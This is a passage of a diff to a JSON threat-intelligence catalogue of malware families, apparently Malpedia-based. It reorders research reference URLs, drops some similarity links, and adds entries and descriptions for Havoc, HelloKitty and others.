- "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
"https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
- "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware",
- "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
- "https://twitter.com/inversecos/status/1381477874046169089?s=20",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
"https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
"https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/",
- "http://www.secureworks.com/research/threat-profiles/gold-winter"
+ "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
+ "https://assets.sentinelone.com/sentinellabs/sentinellabs_EvilCorp",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://twitter.com/inversecos/status/1381477874046169089?s=20",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware",
+ "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
+ "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/"
],
"synonyms": [],
"type": []
@@ -25603,26 +27109,26 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit",
- "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/",
- "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/",
- "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/",
- "https://unit42.paloaltonetworks.com/thanos-ransomware/",
- "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html",
- "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
- "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
- "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
- "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
- "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/",
- "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/",
- "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.justice.gov/usao-edny/press-release/file/1505981/download",
- "https://securelist.com/cis-ransomware/104452/"
+ "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html",
+ "https://www.zscaler.com/blogs/security-research/midas-ransomware-tracing-evolution-thanos-ransomware-variants",
+ "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware",
+ "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/",
+ "https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/",
+ "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf",
+ "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
+ "https://securityboulevard.com/2022/03/midas-ransomware-tracing-the-evolution-of-thanos-ransomware-variants/",
+ "https://www.sekoia.io/en/the-story-of-a-ransomware-builder-from-thanos-to-spook-and-beyond-part-1/",
+ "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/",
+ "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/",
+ "https://unit42.paloaltonetworks.com/thanos-ransomware/"
],
"synonyms": [
"Thanos Ransomware"
@@ -25637,10 +27143,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq",
- "https://www.youtube.com/watch?v=JPvcLLYR0tE",
- "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf",
+ "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/",
"https://www.youtube.com/watch?v=FAFuSO9oAl0",
- "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/"
+ "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf",
+ "https://www.youtube.com/watch?v=JPvcLLYR0tE"
],
"synonyms": [],
"type": []
@@ -25653,62 +27159,53 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor",
- "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
- "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
- "https://twitter.com/TheDFIRReport/status/1359669513520873473",
"https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-maldoc-analysis/",
- "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/",
- "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
- "https://muha2xmad.github.io/unpacking/hancitor/",
- "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
- "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
- "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
- "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/",
- "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure",
- "https://blog.group-ib.com/switching-side-jobs",
- "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8",
- "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb",
- "https://cyber-anubis.github.io/malware%20analysis/hancitor/",
- "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://isc.sans.edu/diary/rss/27618",
- "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity",
- "https://muha2xmad.github.io/malware-analysis/fullHancitor/",
- "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
- "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
"https://pid4.io/posts/how_to_write_a_hancitor_extractor/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/",
- "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
- "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
- "https://www.uperesia.com/hancitor-packer-demystified",
- "https://blog.group-ib.com/prometheus-tds",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/",
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/",
+ "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8",
"https://www.malware-traffic-analysis.net/2021/09/29/index.html",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping",
- "https://malware-traffic-analysis.net/2021/09/29/index.html",
- "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5",
"https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-making-use-of-cookies-to-prevent-url-scraping",
+ "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak",
+ "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure",
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.uperesia.com/hancitor-packer-demystified",
+ "https://github.com/OALabs/Lab-Notes/blob/main/Hancitor/hancitor.ipynb",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/",
+ "https://cyber-anubis.github.io/malware%20analysis/hancitor/",
+ "https://muha2xmad.github.io/malware-analysis/fullHancitor/",
"https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/",
- "https://blog.group-ib.com/hancitor-cuba-ransomware"
+ "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/",
+ "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
+ "https://blog.group-ib.com/hancitor-cuba-ransomware",
+ "https://muha2xmad.github.io/unpacking/hancitor/",
+ "https://medium.com/@crovax/extracting-hancitors-configuration-with-ghidra-7963900494b5",
+ "https://twitter.com/TheDFIRReport/status/1359669513520873473",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
+ "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html",
+ "https://malware-traffic-analysis.net/2021/09/29/index.html",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/hancitor-analysing-the-main-loader/",
+ "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/",
+ "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear",
+ "https://blog.group-ib.com/switching-side-jobs",
+ "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
+ "https://www.silentpush.com/blog/pivoting-finding-malware-domains-without-seeing-malicious-activity",
+ "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
+ "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/",
+ "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/",
+ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/",
+ "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
],
"synonyms": [
"Chanitor"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "ff0404a1-465f-4dd5-8b66-ee773628ca64",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "4166ab63-24b0-4448-92ea-21c8deef978d",
"value": "Hancitor"
},
@@ -25729,8 +27226,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf"
+ "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
],
"synonyms": [],
"type": []
@@ -25743,8 +27240,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig",
- "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html",
- "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html"
+ "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html",
+ "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html"
],
"synonyms": [
"Piptea"
@@ -25786,28 +27283,38 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat",
- "https://www.f-secure.com/weblog/archives/00002718.html",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-083a",
- "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
"https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.secureworks.com/research/threat-profiles/iron-liberty"
+ "https://www.f-secure.com/weblog/archives/00002718.html",
+ "https://www.secureworks.com/research/threat-profiles/iron-liberty",
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
+ "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d7183f66-59ec-4803-be20-237b442259fc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a",
"value": "Havex RAT"
},
+ {
+ "description": "Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc",
+ "https://www.zscaler.com/blogs/security-research/havoc-across-cyberspace",
+ "https://twitter.com/embee_research/status/1579668721777643520?s=20&t=nDJOv1Yf5mQZKCou7qMrhQ",
+ "https://github.com/HavocFramework/Havoc",
+ "https://www.youtube.com/watch?v=ErPKP4Ms28s",
+ "https://4pfsec.com/havoc-c2-first-look/"
+ ],
+ "synonyms": [
+ "Havokiz"
+ ],
+ "type": []
+ },
+ "uuid": "ddbcedee-ac3e-45d3-be2c-d7315d83e6a6",
+ "value": "Havoc"
+ },
{
"description": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.",
"meta": {
@@ -25826,26 +27333,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
- "https://www.secureworks.com/research/threat-profiles/gold-galleon",
- "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
- "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html",
- "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
- "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
- "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
- "http://www.secureworks.com/research/threat-profiles/gold-galleon",
- "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
- "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/",
+ "https://www.secureworks.com/research/threat-profiles/gold-galleon",
+ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/",
"https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/",
+ "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/",
+ "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html",
+ "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html",
"https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/",
- "https://github.com/itaymigdal/malware-analysis-writeups/blob/main/HawkEye/HawkEye.md"
+ "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/",
+ "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry",
+ "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-galleon"
],
"synonyms": [
"HawkEye",
@@ -25862,8 +27370,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr",
- "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1",
- "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html"
+ "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html",
+ "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1"
],
"synonyms": [
"GO-SPORT"
@@ -25884,15 +27392,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d2c1a439-585a-48bc-8176-c0c46dfac270",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d",
"value": "HDRoot"
},
@@ -25901,11 +27400,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip",
- "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine",
- "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip",
"https://cert.gov.ua/article/38097",
- "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip"
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/",
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-headertip-backdoor-shows-attackers-from-china-preying-on-ukraine"
],
"synonyms": [],
"type": []
@@ -25923,15 +27422,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7c05c816-481f-499e-9545-d48b635dc2eb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f",
"value": "Helauto"
},
@@ -25940,38 +27430,42 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hellobot",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt"
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html"
],
"synonyms": [],
"type": []
},
"uuid": "64cecfd4-96fd-42a3-8537-fc0e041271a2",
- "value": "HelloBot"
+ "value": "HelloBot (Windows)"
},
{
- "description": "",
+ "description": "Unit42 states that HelloKitty is a ransomware family that first surfaced at the end of 2020, primarily targeting Windows systems. The malware family got its name due to its use of a Mutex with the same name: HelloKittyMutex. The ransomware samples seem to evolve quickly and frequently, with different versions making use of the .crypted or .kitty file extensions for encrypted files. Some newer samples make use of a Golang packer that ensures the final ransomware code is only loaded in memory, most likely to evade detection by security solutions.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty",
- "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
- "https://www.ic3.gov/Media/News/2021/211029.pdf",
- "https://twitter.com/fwosar/status/1359167108727332868",
- "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
- "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
- "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks",
+ "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
"https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
+ "https://twitter.com/fwosar/status/1359167108727332868",
+ "https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
+ "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7",
+ "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
"https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.ic3.gov/Media/News/2021/211029.pdf",
+ "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/",
"https://www.speartip.com/resources/fbi-hellokitty-ransomware-adds-ddos-to-extortion-arsenal/",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
"https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
- "https://medium.com/proferosec-osm/static-unpacker-and-decoder-for-hello-kitty-packer-91a3e8844cb7",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/"
+ "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/",
+ "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/"
],
"synonyms": [
"KittyCrypt"
@@ -25986,12 +27480,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth",
- "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability",
- "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
"http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
+ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
+ "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability",
+ "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/",
+ "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
@@ -26032,9 +27526,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor",
"https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html",
- "https://vblocalhost.com/uploads/VB2021-Slowik.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
+ "https://vblocalhost.com/uploads/VB2021-Slowik.pdf"
],
"synonyms": [],
"type": []
@@ -26047,16 +27541,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html",
- "https://www.youtube.com/watch?v=9nuo-AGg4p4",
- "https://web.archive.org/web/20200922165625/https://dcso.de/2019/03/18/enterprise-malware-as-a-service/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
